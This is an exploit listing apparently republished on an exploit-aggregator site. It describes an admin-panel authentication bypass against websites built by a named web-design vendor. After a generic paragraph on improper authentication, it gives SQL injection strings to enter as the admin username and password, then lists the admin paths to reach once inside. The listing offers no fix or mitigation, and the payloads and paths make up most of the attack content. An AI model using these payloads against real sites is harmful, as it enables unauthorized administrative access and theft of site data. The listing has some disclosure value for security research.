Advertisement






SSInfoTech Rohini WebDesign Company Authentication Bypass

CVE Category Price Severity
Author Risk Exploitation Type Date
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019090124

Below is a copy:

SSInfoTech Rohini WebDesign Company Authentication Bypass
####################################################################

# Exploit Title : SSInfoTech Rohini WebDesign Company Authentication Bypass
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 18/09/2019
# Vendor Homepage : ssinfoteck.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : High
# Vulnerability Type : CWE-287 [ Improper Authentication ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

####################################################################

# Impact :
***********
Authentication is any process by which a system verifies the identity of a user who wishes 
to access it.When an actor claims to have a given identity, the software does not 
prove or insufficiently proves that the claim is correct. Improper authentication 
occurs when an application improperly verifies the identity of a user. 
A software incorrectly validates user's login information and as a result, an attacker can 
gain certain privileges within the application or disclose sensitive information that allows 
them to access sensitive data and provoke arbitrary code execution.
The weakness is introduced during Architecture and Design, Implementation stages.

####################################################################

# Authentication Bypass / Admin Panel Login Bypass Exploit :
******************************************************
Admin Panel Login Path : 
/admin

Admin Username : 
admin' or '1'='1
anything' OR 'x'='x
' or 1=1 limit 1 -- -+
Admin Password : 
admin' or '1'='1
anything' OR 'x'='x
' or 1=1 limit 1 -- -+

/admin/login.php
/admin/subadd.php
/admin/testadd.php
/admin/questionadd.php
/admin/view_question.php
/admin/update.php?update=[ID Number]
/admin/cms.php
/admin/cms_management.php?id=[ID Number]
/admin/result.php
/admin/view_result.php
/admin/update_certificate.php?update=[ID Number]
/admin/signup.php

####################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

####################################################################

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.